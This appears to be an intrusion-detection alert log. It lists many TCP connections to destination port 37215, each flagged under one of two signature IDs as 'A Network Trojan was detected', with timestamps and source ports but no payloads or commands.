                Timestamp:05/29/24-15:15:53.873728
                SID:2835222
                Source Port:37398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227472
                SID:2829579
                Source Port:54904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675436
                SID:2835222
                Source Port:58082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725812
                SID:2829579
                Source Port:37906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981411
                SID:2829579
                Source Port:60812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968634
                SID:2835222
                Source Port:44628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154338
                SID:2829579
                Source Port:60746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176511
                SID:2829579
                Source Port:47652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945709
                SID:2835222
                Source Port:45232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165247
                SID:2835222
                Source Port:47728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856262
                SID:2829579
                Source Port:51268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075011
                SID:2835222
                Source Port:43976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380372
                SID:2835222
                Source Port:60454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653663
                SID:2835222
                Source Port:56068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419959
                SID:2829579
                Source Port:58488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683599
                SID:2829579
                Source Port:44760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.842469
                SID:2835222
                Source Port:46224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712827
                SID:2835222
                Source Port:52194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.907633
                SID:2829579
                Source Port:46136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.562181
                SID:2835222
                Source Port:46702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651811
                SID:2829579
                Source Port:56234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895887
                SID:2829579
                Source Port:51338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010344
                SID:2835222
                Source Port:53732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.132624
                SID:2829579
                Source Port:40596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036711
                SID:2835222
                Source Port:51630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861868
                SID:2835222
                Source Port:60834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887456
                SID:2829579
                Source Port:47808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726270
                SID:2835222
                Source Port:42566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512364
                SID:2829579
                Source Port:40460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899137
                SID:2835222
                Source Port:43288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039721
                SID:2829579
                Source Port:49690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224713
                SID:2829579
                Source Port:57998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.315906
                SID:2835222
                Source Port:49208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520307
                SID:2835222
                Source Port:33412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466264
                SID:2835222
                Source Port:35418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316140
                SID:2835222
                Source Port:54170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386121
                SID:2835222
                Source Port:45446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951410
                SID:2835222
                Source Port:56146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899215
                SID:2829579
                Source Port:44196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.943074
                SID:2829579
                Source Port:48076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164815
                SID:2829579
                Source Port:57832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.241983
                SID:2829579
                Source Port:59464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730356
                SID:2829579
                Source Port:41648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780744
                SID:2829579
                Source Port:48472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944788
                SID:2835222
                Source Port:49512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154853
                SID:2835222
                Source Port:47132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140824
                SID:2835222
                Source Port:46590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561720
                SID:2829579
                Source Port:56258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515594
                SID:2835222
                Source Port:41300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869616
                SID:2835222
                Source Port:54774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088274
                SID:2829579
                Source Port:35088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518971
                SID:2835222
                Source Port:41480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267590
                SID:2829579
                Source Port:33088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558654
                SID:2835222
                Source Port:41038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766359
                SID:2835222
                Source Port:53280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763204
                SID:2835222
                Source Port:36602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811801
                SID:2829579
                Source Port:60148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941467
                SID:2829579
                Source Port:58820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908874
                SID:2829579
                Source Port:36056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222918
                SID:2829579
                Source Port:50512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826857
                SID:2829579
                Source Port:40590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277670
                SID:2829579
                Source Port:45618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276163
                SID:2829579
                Source Port:34282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418981
                SID:2829579
                Source Port:51840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369366
                SID:2835222
                Source Port:48552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.562290
                SID:2829579
                Source Port:49174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182515
                SID:2835222
                Source Port:40956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418857
                SID:2829579
                Source Port:44620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419313
                SID:2835222
                Source Port:36222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361735
                SID:2835222
                Source Port:57864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032550
                SID:2835222
                Source Port:40938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652900
                SID:2829579
                Source Port:49520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559717
                SID:2835222
                Source Port:54438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421955
                SID:2835222
                Source Port:59886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807459
                SID:2835222
                Source Port:56410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925845
                SID:2835222
                Source Port:51518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667330
                SID:2835222
                Source Port:37340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791033
                SID:2835222
                Source Port:37112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210711
                SID:2829579
                Source Port:56886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463195
                SID:2835222
                Source Port:39720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655580
                SID:2829579
                Source Port:40144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521849
                SID:2835222
                Source Port:50812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897119
                SID:2829579
                Source Port:39304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.268425
                SID:2835222
                Source Port:56826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.097451
                SID:2835222
                Source Port:33552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683982
                SID:2835222
                Source Port:40610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887506
                SID:2835222
                Source Port:57312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667986
                SID:2829579
                Source Port:60316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911234
                SID:2829579
                Source Port:35124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390782
                SID:2829579
                Source Port:47502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282279
                SID:2829579
                Source Port:35412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173451
                SID:2829579
                Source Port:41166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209375
                SID:2829579
                Source Port:53718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675327
                SID:2835222
                Source Port:38480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500177
                SID:2835222
                Source Port:39318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810084
                SID:2835222
                Source Port:45284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321075
                SID:2829579
                Source Port:48524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.231713
                SID:2835222
                Source Port:53734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845236
                SID:2835222
                Source Port:52690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136179
                SID:2835222
                Source Port:37122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238881
                SID:2835222
                Source Port:56542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858126
                SID:2835222
                Source Port:38144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181564
                SID:2835222
                Source Port:47174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551448
                SID:2829579
                Source Port:36262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444247
                SID:2835222
                Source Port:44768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179498
                SID:2829579
                Source Port:48146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558039
                SID:2835222
                Source Port:34546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738357
                SID:2835222
                Source Port:42484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837749
                SID:2835222
                Source Port:38886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942657
                SID:2835222
                Source Port:33940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654222
                SID:2829579
                Source Port:44032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.628401
                SID:2835222
                Source Port:59020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.044688
                SID:2835222
                Source Port:46928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136157
                SID:2835222
                Source Port:40964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899206
                SID:2829579
                Source Port:55242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.703886
                SID:2829579
                Source Port:57984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869499
                SID:2835222
                Source Port:53040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100871
                SID:2829579
                Source Port:39184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639822
                SID:2829579
                Source Port:40010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292689
                SID:2829579
                Source Port:40702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364383
                SID:2829579
                Source Port:56586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072495
                SID:2829579
                Source Port:36782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574528
                SID:2835222
                Source Port:41238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320618
                SID:2835222
                Source Port:39034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730378
                SID:2829579
                Source Port:53954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179984
                SID:2835222
                Source Port:44326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928527
                SID:2829579
                Source Port:44320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910981
                SID:2829579
                Source Port:33462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912440
                SID:2829579
                Source Port:58940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264721
                SID:2829579
                Source Port:57200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.918378
                SID:2829579
                Source Port:49964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853405
                SID:2829579
                Source Port:35676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810605
                SID:2829579
                Source Port:41738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639000
                SID:2829579
                Source Port:39634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276494
                SID:2829579
                Source Port:43910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.800352
                SID:2829579
                Source Port:34206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848608
                SID:2835222
                Source Port:47132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681840
                SID:2835222
                Source Port:37316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024587
                SID:2829579
                Source Port:44632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.279234
                SID:2829579
                Source Port:58872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.940979
                SID:2835222
                Source Port:41142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074667
                SID:2835222
                Source Port:41184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783729
                SID:2829579
                Source Port:37088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331480
                SID:2829579
                Source Port:54408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335536
                SID:2835222
                Source Port:45266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874807
                SID:2829579
                Source Port:58826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520632
                SID:2829579
                Source Port:52246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779433
                SID:2829579
                Source Port:41910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381665
                SID:2829579
                Source Port:36716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652553
                SID:2829579
                Source Port:56394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222871
                SID:2835222
                Source Port:34912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286944
                SID:2829579
                Source Port:47240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135970
                SID:2829579
                Source Port:55088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966205
                SID:2835222
                Source Port:48172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943550
                SID:2835222
                Source Port:36258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870355
                SID:2835222
                Source Port:48512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575001
                SID:2835222
                Source Port:60314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681545
                SID:2829579
                Source Port:59628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281204
                SID:2835222
                Source Port:51694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.131558
                SID:2829579
                Source Port:41986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572404
                SID:2835222
                Source Port:48296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728331
                SID:2829579
                Source Port:35408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421098
                SID:2835222
                Source Port:50984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.334622
                SID:2829579
                Source Port:35460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841797
                SID:2829579
                Source Port:47978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681820
                SID:2829579
                Source Port:37460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561905
                SID:2835222
                Source Port:48668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902391
                SID:2835222
                Source Port:39530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162652
                SID:2835222
                Source Port:45886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189903
                SID:2835222
                Source Port:52586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.648435
                SID:2829579
                Source Port:44210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808391
                SID:2829579
                Source Port:42932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.815019
                SID:2829579
                Source Port:53464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617609
                SID:2829579
                Source Port:60568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654120
                SID:2835222
                Source Port:46692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170351
                SID:2835222
                Source Port:40680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224439
                SID:2835222
                Source Port:53850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418017
                SID:2835222
                Source Port:48170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665382
                SID:2835222
                Source Port:56960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983107
                SID:2829579
                Source Port:34772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.230772
                SID:2829579
                Source Port:52666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947271
                SID:2829579
                Source Port:55548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969651
                SID:2835222
                Source Port:48956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281603
                SID:2829579
                Source Port:35892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.450166
                SID:2835222
                Source Port:53448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520045
                SID:2829579
                Source Port:56228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.097426
                SID:2835222
                Source Port:58280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869512
                SID:2835222
                Source Port:53840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667927
                SID:2835222
                Source Port:41942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967983
                SID:2829579
                Source Port:46840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226165
                SID:2829579
                Source Port:45964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764417
                SID:2835222
                Source Port:44780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364280
                SID:2835222
                Source Port:33554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287212
                SID:2829579
                Source Port:41490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.441145
                SID:2835222
                Source Port:40118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946287
                SID:2835222
                Source Port:56520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967031
                SID:2835222
                Source Port:48860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662400
